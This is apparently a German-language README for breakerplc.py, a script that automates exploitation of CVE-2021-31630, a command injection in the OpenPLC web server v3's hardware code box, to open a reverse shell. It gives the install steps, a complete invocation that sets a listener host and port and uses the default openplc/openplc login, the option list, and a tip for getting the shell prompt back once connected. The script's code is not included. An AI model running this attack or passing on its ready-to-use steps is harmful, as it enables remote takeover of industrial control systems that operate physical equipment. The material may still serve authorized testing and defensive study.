
Dies ist eine Automatisierung der Ausnutzung von cve-2021-31630.
Dieses Skript nutzt automatisch eine Schwachstelle im OpenPLC-Webserver v3 aus
Sie können ohne manuelle Techniken eine automatische Reverse Shell mit dem Server erstellen.
CVE-2021-31630 Details Eine Befehlsinjektion im OpenPLC-Webserver v3 ermöglicht es entfernten Angreifern, beliebigen Code über die Komponente "Hardware Layer Code Box" auf der Seite "/hardware" der Anwendung auszuführen.
Das Skript wurde so angepasst, dass es nach Abschluss der Skriptregistrierung in OpenPLC die Shell der Maschine im selben Terminal generiert.
Verwenden Sie den folgenden Befehl (Wir empfehlen, eine Python- virtuelle Umgebung zu erstellen, um die Abhängigkeiten zu installieren) # Das breakerplc.py-Skript muss jedoch außerhalb der virtuellen Umgebung ausgeführt werden.
sudo apt update
pip3 install requests
Wie verwenden? Sie können diese Befehlszeile (unten) verwenden.
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Ziel-URL mit http(s)://
options:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
-u U Benutzername
-p P Passwort
-t T Anfrage-Timeout, erhöhen Sie, wenn der Server langsam ist
-lh LH LHOST
-lp LP LPORT

WICHTIG
Nach der Verbindung müssen Sie "whoami" oder "ls" eingeben, um die Codezeile zu unterbrechen und die Shell zurückzuerhalten.
